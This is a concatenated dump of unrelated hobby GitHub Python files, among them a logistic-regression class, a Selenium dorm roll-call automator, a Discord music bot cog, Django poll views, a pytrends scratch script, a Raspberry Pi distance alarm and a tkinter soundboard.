sum=0\n for el in self.dataIn:\n sum=sum+el[i]\n list_means.append(sum/n)\n list_deviation = []\n for i in range(noAttributes):\n sum=0\n for el in self.dataIn:\n sum=sum+(el[i]-list_means[i])**2\n list_deviation.append(math.sqrt(sum/(n-1)))\n normalized_dataIn=[]\n for i in range(n):\n li=[]\n for j in range(len(self.dataIn[i])):\n li.append((self.dataIn[i][j]-list_means[j])/list_deviation[j])\n normalized_dataIn.append(li)\n #denormalization\n #a=normalized_dataIn[0][0]\n #print(a*list_deviation[0]+list_means[0])\n #print(\"normaized data\",normalized_dataIn)\n return [normalized_dataIn,list_means,list_deviation]\n def normalize_oneData(self,data):\n l=self.normalizeDataIn()\n for i in range(len(data[0])):\n data[0][i]=(data[0][i]-l[1][i])/l[2][i]\n return data\n def constructInputMatrix(self): #data initialy given as bidimensional list\n input=self.normalized_dataIn\n Matrix=np.array(input)\n #print(\"matrix\",Matrix)\n return Matrix\n def constructOutMatrix(self):\n l=[]\n for el in self.dataOut:\n l.append([el])\n l=np.array(l)\n return l\n def constructCoeffMatrix(self): #we have 7 features for each data row so we have to initialize 7+1(free) coefficient which will later be learnt\n m=len(self.dataIn[0])\n l=np.random.rand(m,1)\n l=np.array(l)\n coef=[[0.5] for i in range(m)]\n coef=np.array(coef)\n return coef\n\n def sigmoidFunction(self,z):\n return 1.0 / (1.0 + math.exp(0.0 - z))\n def gradientDescent(self,x, y, theta, alpha, num_iters): #BGD\n \"\"\"\n Performs gradient descent to learn theta\n \"\"\"\n myfunc_vec = np.vectorize(self.sigmoidFunction)\n m = 
y.size # number of training examples\n for i in range(num_iters):\n y_hat = myfunc_vec(np.dot(x, theta))\n theta = theta - alpha * np.dot(x.T, y_hat - y)\n return theta\n def prediction(self,example, coef):\n s = 0.0\n for i in range(0, len(example)):\n s += coef[i] * example[i]\n return s\n def train(self):\n maxiter=100\n input=self.constructInputMatrix()\n out=self.constructOutMatrix()\n coef=self.constructCoeffMatrix()\n learning_rate=0.001\n return self.gradientDescent(input,out,coef,learning_rate,maxiter)\n def model(self,input):\n a=self.train()\n input=self.normalize_oneData(input)\n res = self.sigmoidFunction(self.prediction(input[0], a))\n cut_point=0.5\n print(\"The probability is:\",res)\n if(res>=cut_point):\n return 1\n return 0\n","repo_name":"TidorP/DiagnosticPrediction","sub_path":"Diagnostic/LogisticRegression.py","file_name":"LogisticRegression.py","file_ext":"py","file_size_in_byte":3217,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"29694562120","text":"import smtplib\nimport email.message\nfrom selenium import webdriver\nfrom selenium.webdriver.chrome.options import Options\nimport chromedriver_autoinstaller\nimport schedule\n\n\n_acc = str(input('請輸入學號:'))\n_pwd = str(input('請輸入校務系統密碼:'))\n_email = str(input('請輸入email:'))\n\ndef job():\n chromedriver_autoinstaller.install()\n print('自動點名系統啟動中')\n\n chrome_options = Options()\n chrome_options.add_argument('--no-sandbox')\n chrome_options.add_argument('--disable-dev-shm-usage')\n driver = webdriver.Chrome(options=chrome_options)\n driver.implicitly_wait(10)\n\n driver.get('http://db.kh.usc.edu.tw/dormRollCall/login.php')\n driver.find_element('xpath','/html/body/form/center/table/tbody/tr[1]/td[2]/input').send_keys(_acc)# enter acc\n driver.find_element('xpath','/html/body/form/center/table/tbody/tr[2]/td[2]/input').send_keys(_pwd)# enter pwd\n driver.find_element('xpath','/html/body/form/center/table/tbody/tr[3]/td/input').click()# click login\n driver.find_element('xpath','/html/body/form/input[2]').click()# roll call\n alert = driver.switch_to.alert\n alert_text = alert.text\n alert.accept()\n\n if '非校內宿舍IP' in alert_text:\n print('點名失敗,請連接宿舍網路')\n\n msg=email.message.EmailMessage()\n\n msg['From']='lamerk0218@gmail.com'\n msg['To']=_email\n msg['Subject']='點名失敗,請手動點名'\n\n msg.add_alternative('
點名失敗,請手動點名
', subtype='html')\n\n server=smtplib.SMTP_SSL('smtp.gmail.com', 465)\n server.login('lamerk0218', 'PWD_HERE')\n server.send_message(msg)\n server.close()\n\n else:\n print('點名成功')\n\n driver.close()\n\nschedule.every().day.at('21:35').do(job)\n\nwhile True:\n schedule.run_pending()","repo_name":"Xeift/khusc-dorm-roll-call","sub_path":"auto_check.py","file_name":"auto_check.py","file_ext":"py","file_size_in_byte":1840,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"16050841768","text":"#! /usr/bin/env python3\n# -*- coding: utf-8 -*-\n# Manually added\n# %%06e04634dc02a21685ae0bf1dca0dadbeff3eb0758082e61fcd2304ae19ba69e7afda013125c5f1d3138487a150f61a0118734169f4c28e12ecbf82c7b0f3873%%\n#\n# PySyE project: new.py - script for generation of python modules and scripts.\n#\n# the best way to integrate this code to the system is to add source directory to the\n# PATH environment variable.\n\nSCRIPT_DEBUG_MODE = False\n\n#\n# Standard modules imports\n#\nimport sys\nimport os\nimport platform\nimport argparse\nimport inspect\n\n\n#\n# Custom modules imports\n#\nfrom hashing import do_hash\nimport scripts_commons\nfrom scripts_commons import get_conf, DEFAULT_LOCATOR_SOURCE, DEFAULT_ENC, check_os, main, writable\nfrom templating import TemplateManager\n\nNEW_CONF = '.new_conf'\n\n \ndef execute(script_name, script_dir, cur_dir, paths):\n \"\"\"\n usage: new.py filename [-t app|script|module] [-l locator]\n \n -t and -l autowired from .new_conf\n \"\"\"\n \n temp_manager = TemplateManager()\n elements = {}\n \n conf = os.path.join(script_dir, NEW_CONF)\n \n if os.path.isfile(conf):\n elements = get_conf(conf)\n \n if len(sys.argv) < 2:\n print(\"{0:s}: No arguments specified\".format(script_name))\n exit(0)\n \n parser = argparse.ArgumentParser()\n parser.add_argument(\"destination\", \n help=\"Python file path\", \n type=str)\n parser.add_argument(\"-t\", \"--type\", \n help=\"Type of python file\", \n choices=temp_manager.choices())\n parser.add_argument(\"-l\", \"--locator\", \n help=\"Common identifier\", \n type=str)\n args = parser.parse_args()\n \n if 'template' in elements or args.type:\n if args.type:\n selected_template = args.type\n else:\n selected_template = elements['template']\n else:\n selected_template = temp_manager.APP\n \n if 'locator' in elements or args.locator:\n if args.locator:\n locator_source = bytes(args.locator, DEFAULT_ENC)\n else:\n locator_source = bytes(elements['locator'], DEFAULT_ENC)\n else:\n locator_source = DEFAULT_LOCATOR_SOURCE\n \n filepath = args.destination\n\n print(\"Creating {0:s} as python main...\".format(filepath), end=\"\")\n\n if not writable(filepath):\n print(\"Writing {0:s} aborted.\".format(filepath))\n exit(0)\n \n template_path = temp_manager.get_path(selected_template)\n\n with open(os.path.join(script_dir, template_path), \"r\") as fr:\n with open(filepath, \"w\") as fw:\n \n if selected_template == temp_manager.MODULE:\n get_conf_func = \"\".join(inspect.getsourcelines(get_conf)[0])\n module_name = os.path.splitext(os.path.basename(filepath))[0]\n fw.write(fr.read().format(do_hash(locator_source), get_conf_func,\n module_name.upper(), module_name,\n module_name.upper(), module_name.upper()))\n else:\n fw.write(fr.read().format(do_hash(locator_source)))\n \n if selected_template == temp_manager.MODULE:\n os.chmod(filepath, scripts_commons.FileUtils().get_644())\n else:\n os.chmod(filepath, scripts_commons.FileUtils().get_755())\n \n \n print(\"Done\")\n\n\nif __name__ == 
'__main__':\n\n main(execute, SCRIPT_DEBUG_MODE)\n","repo_name":"lmlwci0m/PySyE","sub_path":"new.py","file_name":"new.py","file_ext":"py","file_size_in_byte":3509,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"26647752447","text":"#!/usr/bin/python3\n\nimport socket\nimport sys\nimport time\nimport os.path\nimport json\nimport threading\n\n\nclass Collector(object):\n def __init__(self, serverIp, serverPort, targetDir, intervalSecs):\n self.serverIp = serverIp\n self.serverPort = serverPort\n self.targetDir = targetDir\n self.filenamePrefix = targetDir.split(\"/\")[-1]\n self.intervalSecs = intervalSecs\n\n def request(self, ip, port):\n with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:\n sock.connect((ip, port))\n sock.sendall(bytes(\"read\", 'ascii'))\n response = str(sock.recv(1024), 'ascii')\n print(\"Received: {}\".format(response))\n return response\n\n def collect(self):\n threading.Timer(self.intervalSecs, self.collect).start()\n decoder = json.JSONDecoder()\n response = decoder.decode(self.request(self.serverIp, self.serverPort))\n responseKeys = list(response.keys())\n responseKeys.sort()\n filename = os.path.join(self.targetDir, \"%s-%s.csv\" % (self.filenamePrefix, time.strftime(\"%Y%m%d\")))\n if os.path.exists(filename):\n f = open(filename, \"a\")\n else:\n f = open(filename, \"w\")\n f.write(\"time;%s\\n\" % \";\".join(k for k in responseKeys))\n f.write(\"%s;\" % time.strftime(\"%Y-%m-%d %H:%M:%S\"))\n f.write(\"%s\\n\" % \";\".join(\"%0.2f\" % response[k] for k in responseKeys))\n f.close()\n\n def run(self):\n self.collect()\n\n\nif __name__==\"__main__\":\n if len(sys.argv) != 4:\n sys.stderr.write(\"usage: %s \\n\" % sys.argv[0])\n sys.stderr.write(\" ex: %s 192.168.193.2:9992 /home/pi/offgridtec 60\\n\" % sys.argv[0])\n sys.exit(-1)\n serverIp = sys.argv[1].split(\":\")[0]\n serverPort = int(sys.argv[1].split(\":\")[1])\n targetDir = sys.argv[2]\n intervalSecs = int(sys.argv[3])\n collector = Collector(serverIp, serverPort, targetDir, intervalSecs)\n collector.run()\n","repo_name":"bgoedel/offgridtec","sub_path":"solar-collector.py","file_name":"solar-collector.py","file_ext":"py","file_size_in_byte":2015,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"2810304088","text":"import discord\r\nfrom discord.ext import commands,tasks\r\nfrom pytube import YouTube\r\nimport random\r\nimport requests\r\nimport json\r\nimport asyncio\r\nimport itertools\r\nimport googlesearch as gs\r\n\r\n\r\nasync def music_commands(ctx):\r\n await ctx.send(ctx.author.mention+\" all the music commands are only for educational purposes\")\r\n await ctx.send(\"Music commands are AGAINST YOUTUBE POLICIES, hence restricted :negative_squared_cross_mark: \")\r\n return False\r\n\r\nclass Music(commands.Cog):\r\n def __init__(self,bot):\r\n self.bot=bot\r\n\r\n ## MUSIC COMMANDS\r\n ## AGAINST YOUTUBE POLICIES\r\n ## ONLY FOR EDUCATIONAL PURPOSES\r\n ## Youtube doesnot allow downloading its videos\r\n ## DOESNOT work from heroku server as the download doesnot take place\r\n ## ONLY FUNCTIONAL FROM PERSONAL COMPUTER (as of i know)\r\n \r\n @commands.check(music_commands)\r\n @commands.command(aliases=[\"p\"])\r\n async def play(self,ctx,*,query):\r\n try:\r\n voiceChannel = discord.utils.get(ctx.guild.voice_channels, name=str(ctx.message.author.voice.channel))\r\n await voiceChannel.connect()\r\n await ctx.send(\"Joined 
\"+str(ctx.message.author.voice.channel)+\" voice channel!:white_check_mark:\")\r\n except AttributeError:\r\n await ctx.send(ctx.message.author.mention+\" is not in any voice channel :negative_squared_cross_mark:\")\r\n return\r\n except Exception as e:\r\n print(e)\r\n \r\n url=None\r\n if len(query)==0:\r\n await ctx.send(ctx.message.author.mention+\"you need to provide a youtube video link or any query with the play command :negative_squared_cross_mark:\")\r\n return\r\n elif query.startswith(\"https://www.youtube.com/watch?v=\"):\r\n url=query\r\n else:\r\n s=gs.search(\"https://www.youtube.com/results?search_query=\"+query.replace(\" \",\"+\"),\"com\",\"en\",num=10,stop=10,pause=2.0)\r\n for i in s:\r\n if i.startswith(\"https://www.youtube.com/watch?v=\"):\r\n url=i\r\n break\r\n if url==None:\r\n await ctx.send(ctx.message.author.mention+\" some error is caused :negative_squared_cross_mark:\")\r\n return\r\n voice = discord.utils.get(self.bot.voice_clients, guild=ctx.guild)\r\n yt=YouTube(str(url))\r\n yt_embed=discord.Embed(title=yt.title+\":musical_note:\",description=yt.description,color=discord.Colour.red())\r\n yt_embed.set_thumbnail(url=yt.thumbnail_url)\r\n yt_embed.add_field(name=\"Author: \",value=yt.author+\":musical_score: \",inline=False)\r\n yt_embed.add_field(name=\"Duration: \",value=str(yt.length)+\" seconds :clock3: \",inline=False)\r\n yt_embed.add_field(name=\"Publish date: \",value=str(yt.publish_date)+\":calendar_spiral:\",inline=False)\r\n yt_embed.add_field(name=\"Rating: \",value=str(yt.rating)+\":star2:\",inline=False)\r\n yt_embed.add_field(name=\"Views: \",value=str(yt.views)+\":eyes:\",inline=False)\r\n t=yt.streams.filter(only_audio=True)\r\n t[0].download(\".\\songs\")\r\n try:\r\n print(\".\\songs\\\\\"+yt.title+\".mp4\")\r\n voice.play(discord.FFmpegPCMAudio(\".\\songs\\\\\"+yt.title+\".mp4\"))\r\n await ctx.send(\"Playing \"+yt.title+\" :loud_sound:\")\r\n await ctx.send(embed=yt_embed)\r\n except Exception as e:\r\n print(e)\r\n await ctx.send(ctx.message.author.mention+\" joker already playing audio :negative_squared_cross_mark:\")\r\n await ctx.send(\"Use stop command to stop the currently playing song and leave command to make joker exit the current voice channel\")\r\n return\r\n\r\n @commands.check(music_commands) \r\n @commands.command(aliases=[\"disconnect\",\"exit\"])\r\n async def leave(self,ctx):\r\n voice = discord.utils.get(self.bot.voice_clients, guild=ctx.guild)\r\n if voice.is_connected():\r\n await voice.disconnect()\r\n await ctx.send(\"Disconnected :wave:\")\r\n else:\r\n await ctx.send(\"The bot is not connected to a voice channel. :negative_squared_cross_mark:\")\r\n\r\n @commands.check(music_commands)\r\n @commands.command()\r\n async def pause(self,ctx):\r\n voice = discord.utils.get(self.bot.voice_clients, guild=ctx.guild)\r\n if voice.is_playing():\r\n voice.pause()\r\n await ctx.send(\"Paused :pause_button:\")\r\n else:\r\n await ctx.send(\"Currently no audio is playing. :negative_squared_cross_mark:\")\r\n\r\n @commands.check(music_commands)\r\n @commands.command()\r\n async def resume(self,ctx):\r\n voice = discord.utils.get(self.bot.voice_clients, guild=ctx.guild)\r\n if voice.is_paused():\r\n voice.resume()\r\n await ctx.send(\"Resumed :play_pause: \")\r\n else:\r\n await ctx.send(\"The audio is not paused. 
:negative_squared_cross_mark:\")\r\n\r\n @commands.check(music_commands)\r\n @commands.command()\r\n async def stop(self,ctx):\r\n voice = discord.utils.get(self.bot.voice_clients, guild=ctx.guild)\r\n voice.stop()\r\n await ctx.send(\"Stopped playing :octagonal_sign: \")\r\n\r\n\r\n\r\n\r\n\r\n\r\ndef setup(bot):\r\n bot.add_cog(Music(bot))\r\n","repo_name":"Mastermind-sap/joker","sub_path":"cogs/music.py","file_name":"music.py","file_ext":"py","file_size_in_byte":5206,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"72"} +{"seq_id":"29871701399","text":"from django.shortcuts import render \nfrom django.contrib.auth.decorators import login_required\nfrom django.core.paginator import Paginator\nfrom django.db.models import Count\nfrom polls.models import Poll\n\n@login_required()\ndef polls_list(request):\n all_polls = Poll.objects.all()\n search_term = ''\n if 'name' in request.GET:\n all_polls = all_polls.order_by('text')\n\n if 'date' in request.GET:\n all_polls = all_polls.order_by('pub_date')\n\n if 'vote' in request.GET:\n all_polls = all_polls.annotate(Count('vote')).order_by('vote__count')\n\n if 'search' in request.GET:\n search_term = request.GET['search']\n all_polls = all_polls.filter(text__icontains=search_term)\n\n paginator = Paginator(all_polls, 6) # Show 6 contacts per page\n page = request.GET.get('page')\n polls = paginator.get_page(page)\n\n get_dict_copy = request.GET.copy()\n params = get_dict_copy.pop('page', True) and get_dict_copy.urlencode()\n\n context = {\n 'polls': polls,\n 'params': params,\n 'search_term': search_term,\n }\n return render(request, 'polls/polls_list.html', context)\n\n@login_required()\ndef list_by_user(request):\n all_polls = Poll.objects.filter(owner=request.user)\n paginator = Paginator(all_polls, 7) # Show 7 contacts per page\n\n page = request.GET.get('page')\n polls = paginator.get_page(page)\n\n context = {\n 'polls': polls,\n }\n return render(request, 'polls/polls_list.html', context)\n\n","repo_name":"Alyzbane/AnalysenKompass","sub_path":"pev/polls/views/poll/list.py","file_name":"list.py","file_ext":"py","file_size_in_byte":1493,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"249921643","text":"\"\"\"\nTODO: falta agregar opcion para salvar la info\n\"\"\"\nimport pandas as pd\nimport numpy as np\nfrom pytrends.request import TrendReq\nfrom datetime import datetime\nimport json\n\nclass trends:\n def __init__(self,brand,start,end,agg_locs,loc_dict):\n self.brand=brand\n # self.trends = TrendReq(hl=\"MX\", tz=360,timeout=(10,25),retries=10, backoff_factor=0.1)\n self.start=start\n self.end=end\n # self.data=pd.DataFrame()\n self.agg_locs=agg_locs\n self.data = {}\n self.dict = loc_dict\n\n def save(self,output_path):\n with open(str(output_path),\"w\") as fp:\n json.dump(self.data,fp,indent=4)\n \n def search(self):\n if type(self.agg_locs) != list:\n self.agg_locs=[self.agg_locs]\n for loc in self.agg_locs:\n print(loc)\n print(self.get_geo_code(self.dict,str(loc)))\n trends = TrendReq(hl=\"es-MX\", tz=360,timeout=(10,25),retries=10, backoff_factor=0.1)\n trends.build_payload(kw_list=[self.brand],\n cat=0,\n timeframe=\"{} {}\".format(self.start,self.end),\n geo=str(self.get_geo_code(self.dict,str(loc))))\n print(loc)\n self.data[str(loc)] = json.loads(trends.interest_over_time().drop(labels=['isPartial'],axis='columns').to_json(indent=4, orient=\"index\"))\n\n def get_geo_code(self, dict,loc):\n return dict[str(loc)]\n \n def 
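The Django view above leans on `Paginator` for all of its page handling; `get_page` clamps out-of-range page numbers instead of raising, which is why the view can pass `request.GET.get('page')` through unchecked. A self-contained sketch with a plain list standing in for the queryset:

```python
from django.core.paginator import Paginator

items = list(range(20))          # stand-in for Poll.objects.all()
paginator = Paginator(items, 6)  # 6 per page, as in polls_list
page = paginator.get_page("99")  # bogus page numbers are clamped to the last page
print(page.number, list(page))   # 4 [18, 19]
```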
get_data(self):\n return self.data\n\nimport yaml\nwith open(\"MASTERFILE/config.yml\") as f:\n config = yaml.safe_load(f)\n\n\n\ntrends_tiempo = trends(\"BBVA\")\n\nclass pytrendReg_tiempo:\n def __init__(self,brand_):\n self.brand = brand_\n # self.trends = TrendReq(hl=\"MX\", tz=360,timeout=(10,25),retries=10, backoff_factor=0.1)\n # self.data=pd.DataFrame()\n self.data = []\n self.data_reg = []\n \n \n def search(self,start,end):\n trends = TrendReq(hl=\"es-MX\", tz=360,timeout=(10,25),retries=10, backoff_factor=0.1)\n trends.build_payload(kw_list=[self.brand],cat=0,\n timeframe=\"{} {}\".format(start,end),\n geo=str('MX'))\n df_edo = trends.interest_by_region()\n df_edo = df_edo.rename(columns={self.brand:\"Vol_Trends\"})\n #self.datajson = df_edo.to_json(orient=\"index\", force_ascii=False)\n self.data = df_edo\n \n def save(self,output_path):\n with open(str(output_path),\"w\") as fp:\n json.dump(self.data,fp,indent=4)\n\n def regionalize(self):\n data_region = self.MascaraRegion(self.data)\n self.data_reg = data_region.groupby([\"Region\"]).agg(['mean'])\n\n def MascaraRegion(self,df):\n df = df.reset_index().rename(columns={\"geoName\":\"Estado\"})\n noroeste = [\"Baja California\", \"Baja California Sur\", \"Chihuahua\", \"Sinaloa\" ,\"Sonora\"]\n sureste = [ \"Campeche\", \"Chiapas\", \"Guerrero\",\"Oaxaca\", \"Quintana Roo\",\"Tabasco\", \"Veracruz\", \"Yucatán\"]\n occidente = [\"Aguascalientes\", \"Colima\", \"Guanajuato\", \"Jalisco\", \"Michoacán\", \"Nayarit\", \"Querétaro\", \"Zacatecas\"]\n noreste = [\"Coahuila de Zaragoza\", \"Durango\", \"Nuevo León\", \"San Luis Potosí\", \"Tamaulipas\"]\n #centro =[\"Tlaxcala\", \"Ciudad de México\", \"Estado de México\", \"Morelos\", \"Puebla\", \"Hidalgo\"]\n df[\"Region\"] = [\"Noroeste\" if i in noroeste else \"SurEste\" if i in sureste else \"Occidente\" if i in occidente else \"Noreste\" if i in noreste else \"Centro\" for i in df[\"Estado\"] ]\n return (df)\n\n\n \n \n \nejemplo = pytrendReg_tiempo(\"BBVA\")\nejemplo.search(\"2020-01-01\",\"2020-05-01\")\nejemplo.regionalize()\nejemplo.data_reg\nejemplo.save()\n\n\n\nsum=0\nregiones = config['variables']['vars']['agg_locs']['region']\nfor region in regiones.keys():\n for estado in regiones[region]:\n ej_data = json.loads(ejemplo.data)\n sum = sum + ej_data[estado][\"Vol_Trends\"]\n promedio = sum/len(regiones[region])\n data_region[region] = {\"Vol_Trend_avg\": promedio}\n\n\n\n\n\n\n\n\ntrends_tiempo = trends(\"BBVA\",\"2020-01-01\",\"2020-05-01\",config[\"variables\"][\"vars\"][\"agg_locs\"][\"estado\"],config[\"variables\"][\"vars\"][\"dict_estado_codigo\"])\ntrends_tiempo.search()\ntrends_tiempo.data\ntrends_tiempo.save(\"BBVAHackathon/Data/trends_tiempo.json\")\n\na.get_geo_code(config[\"variables\"][\"vars\"][\"dict_estado_codigo\"],\"Aguascalientes\")[3:]\nconfig[\"variables\"][\"vars\"][\"agg_locs\"].keys()\nconfig[\"variables\"][\"vars\"][\"dict_estado_codigo\"]\nfrom pytrends.request import TrendReq\nTrendReq()\nend = \"2020-05-01\"\ndt=datetime.strptime(end,\"%Y-%m-%d\")\ndt.date()","repo_name":"jcarvargtz/twitter_marcas_master","sub_path":"MASTERFILE/Utils/base_trends.py","file_name":"base_trends.py","file_ext":"py","file_size_in_byte":4684,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"30135708666","text":"from setuptools import setup, find_packages\r\n\r\nwith open(\"README.md\", \"r\") as f:\r\n long_description = f.read()\r\n\r\nsetup(\r\n name=\"ecowater_softener\",\r\n version=\"1.0.0\",\r\n 
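Both classes in the trends record wrap the same two pytrends calls: `build_payload` registers the query, then either `interest_over_time` or `interest_by_region` fetches it. The core flow reduced to a sketch (needs network access; the keyword, dates, and geo are the ones used above):

```python
from pytrends.request import TrendReq

pytrends = TrendReq(hl="es-MX", tz=360)
pytrends.build_payload(kw_list=["BBVA"], timeframe="2020-01-01 2020-05-01", geo="MX")
by_region = pytrends.interest_by_region()  # one row per Mexican state
print(by_region.sort_values("BBVA", ascending=False).head())
```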
author=\"barleybobs\",\r\n description=\"A small package to pull data from Ecowater water softeners\",\r\n long_description=long_description,\r\n long_description_content_type=\"text/markdown\",\r\n url=\"https://github.com/barleybobs/ecowater-softener\",\r\n packages=find_packages(),\r\n classifiers=[\r\n \"Programming Language :: Python :: 3\",\r\n \"License :: OSI Approved :: MIT License\",\r\n \"Operating System :: OS Independent\",\r\n ]\r\n)\r\n","repo_name":"barleybobs/ecowater-softener","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":641,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"72"} +{"seq_id":"12136991293","text":"#!/opt/miniconda3/bin/python\nimport numpy as np\nfrom matplotlib import pyplot as plt\n\nA = np.loadtxt(\"result_of_maxent/A.txt\")\nlambda_ = x = np.loadtxt(\"result_of_maxent/lambda.txt\") # 'lambda' is a reserved keyword in Python, so a trailing underscore was added to the variable name per the style guide\nx = np.loadtxt(\"result_of_maxent/x.txt\")\ny = np.loadtxt(\"result_of_maxent/y.txt\")\n\nwith open('index.txt', 'r') as f: index68 = int(f.read())\n\nxsolplot = x[:,index68]*100\n\nlow_limit = 1.5 # pick a low limit weight appropriate for your situation\na = 1\n\nx = np.arange(1, len(xsolplot) + 1)\ny = xsolplot\n\nfig = plt.figure()\n\nplt.plot(x, y)\n\nplt.title('Max Entropy Result', fontsize=15)\nplt.xlabel('Structure', fontsize=15)\nplt.ylabel('Weight (%)', fontsize=15)\n\nplt.ticklabel_format(useOffset=False)\n\nplt.tight_layout()\n\nplt.show()\n","repo_name":"ehb54/nmrsuite","sub_path":"work/maxent/Python/PlotResultsBeforeCluster.py","file_name":"PlotResultsBeforeCluster.py","file_ext":"py","file_size_in_byte":831,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"15480739310","text":"import pynini\nfrom pynini.lib import pynutil\n\nfrom ukr.graph_utils import GraphFst, delete_space, NEMO_NOT_QUOTE\n\n\nclass CardinalFst(GraphFst):\n \"\"\"\n Finite state transducer for verbalizing cardinal\n e.g. 
cardinal { integer: \"23\" negative: \"-\" } -> -23\n \"\"\"\n\n def __init__(self):\n super().__init__(name=\"cardinal\", kind=\"verbalize\")\n\n # 'cardinal { negative: \"true\" integer: \"70\" }'\n optional_sign = pynini.closure(\n pynutil.delete(\"negative:\")\n + delete_space\n + pynutil.delete(\"\\\"\")\n + pynini.cross(\"true\", \"-\")\n + pynutil.delete(\"\\\"\")\n + delete_space,\n 0,\n 1,\n )\n graph = (\n pynutil.delete(\"integer:\")\n + delete_space\n + pynutil.delete(\"\\\"\")\n + pynini.closure(NEMO_NOT_QUOTE, 1)\n + pynutil.delete(\"\\\"\")\n )\n graph = optional_sign + graph\n self.numbers = graph\n\n delete_tokens = self.delete_tokens(graph)\n self.fst = delete_tokens.optimize()\n","repo_name":"lociko/ukraine_itn_wfst","sub_path":"ukr/verbalizers/cardinal.py","file_name":"cardinal.py","file_ext":"py","file_size_in_byte":1095,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"72"}
+{"seq_id":"21225799297","text":"'''\nThis program was written to help keep the 2 m COVID social-distancing gap.\n\n'''\n\n# module imports\nimport RPi.GPIO as GPIO\nimport time\n\n# pin assignments\nTRIGGER_PIN = 10\nECHO_PIN = 8\nSWITCH_PIN = 9\nBUZZER_PIN = 6\nLED_R_PIN = 18\nLED_G_PIN = 4\n\n# on/off feature flag\nflag = False\n\n# pin setup\nGPIO.setmode(GPIO.BCM)\nGPIO.setup(TRIGGER_PIN,GPIO.OUT)\nGPIO.setup(ECHO_PIN,GPIO.IN)\nGPIO.setup(SWITCH_PIN,GPIO.IN,GPIO.PUD_UP) # pull-up resistor\nGPIO.setup(BUZZER_PIN,GPIO.OUT)\nGPIO.setup(LED_R_PIN,GPIO.OUT)\nGPIO.setup(LED_G_PIN,GPIO.OUT)\n\n# PWM setup / sounds the note C (262 Hz) on the buzzer\npwm = GPIO.PWM(BUZZER_PIN,262) \npwm.start(0)\n\ntry:\n # set up a 5-second measurement window\n time_start=time.time()\n time_end=time_start+5\n distance = 99999 # no reading yet (the original referenced distance before the first measurement, raising NameError)\n\n while True:\n val = GPIO.input(SWITCH_PIN)\n if val == 0: # pressing the button toggles the flag on/off (the original branched on an undefined switch_status variable)\n flag = not flag\n time.sleep(1) # the pin reads 0 for as long as the button is held, so pause briefly to keep one press from toggling several times\n \n GPIO.output(LED_G_PIN, GPIO.HIGH if flag else GPIO.LOW) # the green LED is lit while the flag is True\n \n # run the measurement only while the flag is True\n if flag == False: continue\n else:\n # take a distance reading once the 5 seconds have passed\n if time.time()>=time_end:\n # distance measurement with the ultrasonic sensor\n GPIO.output(TRIGGER_PIN,True) # 10 us trigger pulse\n time.sleep(0.00001)\n GPIO.output(TRIGGER_PIN,False)\n while GPIO.input(ECHO_PIN) == 0: pass\n start = time.time()\n while GPIO.input(ECHO_PIN) == 1: pass\n stop = time.time()\n duration_time = stop -start \n distance = 17160 * duration_time # sound travels ~34320 cm/s; the echo covers the round trip, so halve it\n\n # reset the 5-second window\n time_start=time.time()\n time_end=time_start+5\n \n if(distance < 200): # closer than 2 m\n # piezo buzzer and red LED on!\n pwm.ChangeDutyCycle(50)\n GPIO.output(LED_R_PIN,GPIO.HIGH)\n else:\n # piezo buzzer and red LED off!\n pwm.ChangeDutyCycle(0)\n GPIO.output(LED_R_PIN,GPIO.LOW)\n time.sleep(0.1)\nfinally:\n GPIO.cleanup()\n","repo_name":"minsung521/2021_IOT_RaspberryPi","sub_path":"1320_오민용_final.py","file_name":"1320_오민용_final.py","file_ext":"py","file_size_in_byte":2809,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"72597153194","text":"import winsound\nfrom tkinter import *\nfrom tkinter import filedialog\n\n\n\n\n\nclass App:\n\n\tdef __init__(self, master):\n\t\tfield_button_name = StringVar()\n\t\tfield_button_dir = StringVar()\n\n\t\tdict = {}\n\n\t\tframe_main = Frame(master)\n\t\tframe_main.grid(row = 0)\n\t\t\n\t\tframe_buttons = Frame(master)\n\t\tframe_buttons.grid(row = 1)\n\t\t\n\t\t\n\t\tlabel_name_entry = Label(frame_main, text = \"Button Name:\")\n\t\tlabel_name_entry.grid(row = 0, column = 0)\n\t\t\t\n\t\tbutton_find_song = Button(frame_main, text = \"Select Song\",command = lambda : sound_directory())\n\t\tbutton_find_song.grid(row = 1, column = 0)\t\n\t\t\t\n\t\tentry_name_button = Entry(frame_main, textvariable = field_button_name, width = 40) ##Field for files\n\t\tentry_name_button.grid(row = 0, column = 1)\n\t\t\t\n\t\tentry_dir_song = Entry(frame_main, textvariable = field_button_dir, width = 40)\n\t\tentry_dir_song.grid(row = 1, column = 1)\n\t\t\n\t\tbutton_make_button = Button(frame_main, text = \"Make Button\", command = lambda : make_new_button())\n\t\tbutton_make_button.grid(row = 0, rowspan =2, column = 2)\n\n\t\tdef sound_directory():\n\t\t\tdirName = filedialog.askopenfilename()\n\t\t\tif dirName:\n\t\t\t\tfield_button_dir.set(dirName)\n\t\t\t\t\n\t\tdef make_new_button():\n\t\t\tbutton_new_made = Button(frame_buttons, text = field_button_name.get(), command = lambda : play_sound(dict [field_button_name.get()]))\n\t\t\tbutton_new_made.pack()\n\t\t\tdict [field_button_name.get()] = field_button_dir.get()\n\t\t\n\t\tdef play_sound(sound_name):\n\t\t\twinsound.PlaySound(sound_name, winsound.SND_FILENAME)\n\t\t\t\n\t\n\t\t\t\nroot = Tk()\n\napp = 